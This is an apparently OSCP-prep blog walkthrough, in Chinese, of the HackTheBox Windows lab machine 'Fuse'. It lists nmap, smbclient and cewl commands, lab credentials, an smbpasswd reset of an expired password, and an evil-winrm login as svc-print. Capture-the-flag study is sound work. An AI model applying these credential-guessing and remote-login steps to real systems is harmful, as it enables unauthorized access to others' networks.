EthanDoctor

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

Ethan医生1周前靶场20

fuse

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)

image.png

nslookup fabricorp.local  10.129.2.5

image.png

image.png


smbclient -L //10.129.2.5/ -N  

image.png


http://fuse.fabricorp.local/papercut/logs/html/index.htm

image.png

cewl -d 5 -m 3 -w password.txt http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers



smbclient -L //10.129.2.5 -U tlavel%Fabricorp01

image.png



错误:Cannot connect to server. Error was NT_STATUS_PASSWORD_MUST_CHANGE
需要用smbpasswd修改密码


sudo smbpasswd -r 10.129.235.28 -U tlavel

smbpasswd -r 10.129.235.28 bhult

更新密码后直接登入然后提权


evil-winrm -i 10.129.235.28 -u svc-print -p '$fab@s3Rv1ce$1'

image.png


标签: OSCP
返回列表

上一篇:OSCP备考_0x54_HackThBox靶机_Windows_remote

下一篇:OSCP备考_0x56_HackThBox靶机_Windows_worker

相关文章

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-12-3,24/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x26_HackThBox靶机_Linux_magic

OSCP备考_0x26_HackThBox靶机_Linux_magic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.216.125 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.229.137 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

名称说明靶机下载链接https://www.vulnhub.com/entry/sickos-11,132/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x13_Vulnhub靶机_Raven: 1

OSCP备考_0x13_Vulnhub靶机_Raven: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-1,256/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.70.193 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号